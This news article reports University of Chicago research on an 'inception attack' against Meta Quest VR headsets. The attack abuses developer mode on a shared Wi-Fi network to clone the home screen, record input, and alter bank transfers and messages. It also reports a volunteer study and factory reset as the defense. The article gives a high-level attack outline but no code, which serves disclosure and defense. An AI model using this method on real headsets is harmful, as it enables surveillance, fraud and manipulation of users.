VR headsets can be hacked with an Inception-style attack
In the Christoper Nolan movie Inception, Leonardo DiCaprio's character uses technology to enter his targets' dreams to steal information and insert false details into their subconscious.
A new inception attack" in virtual reality works in a similar way. Researchers at the University of Chicago exploited a security vulnerability in Meta's Quest VR system that allows hackers to hijack users' headsets, steal sensitive information, and-with the help of generative AI-manipulate social interactions.
The attack hasn't been used in the wild yet, and the bar to executing it is high, because it requires a hacker to gain access to the VR headset user's Wi-Fi network. However, it is highly sophisticated and leaves those targeted vulnerable to phishing, scams, and grooming, among other risks.
In the attack, hackers create an app that injects malicious code into the Meta Quest VR system and then launch a clone of the VR system's home screen and apps that looks identical to the user's original screen. Once inside, attackers can see, record, and modify everything the person does with the headset. That includes tracking voice, gestures, keystrokes, browsing activity, and even the user's social interactions. The attacker can even change the content of a user's messages to other people. The research, which was shared with MIT Technology Review exclusively, is yet to be peer reviewed.
A spokesperson for Meta said the company plans to review the findings: We constantly work with academic researchers as part of our bug bounty program and other initiatives."
VR headsets have slowly become more popular in recent years, but security research has lagged behind product development, and current defenses against attacks in VR are lacking. What's more, the immersive nature of virtual reality makes it harder for people to realize they've fallen into a trap.
The shock in this is how fragile the VR systems of today are," says Heather Zheng, a professor of computer science at the University of Chicago, who led the team behind the research.
Stealth attackThe inception attack exploits a loophole in Meta Quest headsets: users must enable developer mode" to download third-party apps, adjust their headset resolution, or screenshot content, but this mode allows attackers to gain access to the VR headset if they're using the same Wi-Fi network.
Developer mode is supposed to give people remote access for debugging purposes. However, that access can be repurposed by a malicious actor to see what a user's home screen looks like and which apps are installed. (Attackers can also strike if they are able to access a headset physically or if a user downloads apps that include malware.) With this information, the attacker can replicate the victim's home screen and applications.
Then the attacker stealthily injects an app with the inception attack in it. The attack is activated and the VR headset hijacked when unsuspecting users exit an application and return to the home screen. The attack also captures the user's display and audio stream, which can be livestreamed back to the attacker.
In this way, the researchers were able to see when a user entered login credentials to an online banking site. Then they were able to manipulate the user's screen to show an incorrect bank balance. When the user tried to pay someone $1 through the headset, the researchers were able to change the amount transferred to $5 without the user realizing. This is because the attacker can control both what the user sees in the system and what the device sends out.
This banking example is particularly compelling, says Jiasi Chen, an associate professor of computer science at the University of Michigan, who researches virtual reality but was not involved in the research. The attack could probably be combined with other malicious tactics, such as tricking people to click on suspicious links, she adds.
The inception attack can also be used to manipulate social interactions in VR. The researchers cloned Meta Quest's VRChat app, which allows users to talk to each other through their avatars. They were then able to intercept people's messages and respond however they wanted.
Generative AI could make this threat even worse because it allows anyone to instantaneously clone people's voices and generate visual deepfakes, which malicious actors could then use to manipulate people in their VR interactions, says Zheng.
Twisting realityTo test how easily people can be fooled by the inception attack, Zheng's team recruited 27 volunteer VR experts. The participants were asked to explore applications such as a game called Beat Saber, where players control light sabers and try to slash beats of music that fly toward them. They were told the study aimed to investigate their experience with VR apps. Without their knowledge, the researchers launched the inception attack on the volunteers' headsets.
The vast majority of participants did not suspect anything. Out of 27 people, only 10 noticed a small glitch" when the attack began, but most of them brushed it off as normal lag. Only one person flagged some kind of suspicious activity.
There is no way to authenticate what you are seeing once you go into virtual reality, and the immersiveness of the technology makes people trust it more, says Zheng. This has the potential to make such attacks especially powerful, says Franzi Roesner, an associate professor of computer science at the University of Washington, who studies security and privacy but was not part of the study.
The best defense, the team found, is restoring the headset's factory settings to remove the app.
The inception attack gives hackers many different ways to get into the VR system and take advantage of people, says Ben Zhao, a professor of computer science at the University of Chicago, who was part of the team doing the research. But because VR adoption is still limited, there's time to develop more robust defenses before these headsets become more widespread, he says.